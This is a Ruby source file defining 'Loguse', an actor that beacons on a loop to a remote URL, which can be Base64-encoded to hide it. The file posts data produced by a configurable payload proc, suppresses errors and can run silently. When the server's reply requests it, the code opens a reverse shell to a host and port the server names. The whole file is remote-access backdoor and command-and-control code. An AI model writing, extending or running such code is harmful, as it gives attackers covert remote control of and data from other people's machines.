require 'celluloid'
require 'base64'
require 'unirest'
require 'thread'
require 'json'

class Loguse
	class LoguseActor
		include Celluloid

		attr_reader :shell_th
		attr_reader :log_th
		attr_reader :shell

		def initialize
			@shell = nil

			self.async.run_threads
		end

		def run_threads
			loop do
				resp = log_thread
				rvshell = get_rvshell_details(resp)

				if rvshell[:rvshell]
					shell_thread rvshell[:host], rvshell[:port]
				end

				sleep(Loguse.period)
			end
		end

		def get_rvshell_details(resp)
			host = resp["host"]
			port = resp["port"]
			rvshell = resp["rvshell"]

			{host: host, port: port, rvshell: rvshell}
		end

		def shell_thread(host, port)
			unless (@shell && @shell.open?)
				@shell = Loguse::Shell.new host, port
			end
		end

		def log_thread
			resp = {}
			begin
				payload = Loguse.payload_proc.call
				url = Loguse.url
				url = Base64.decode64(url) if Loguse.url_encoded

				Unirest.timeout(5) 
				resp = Unirest.post url, parameters: payload
				resp = resp.body

				puts "Response: #{resp}" unless Loguse.silent 
			rescue
			end

			resp
		end
	end
end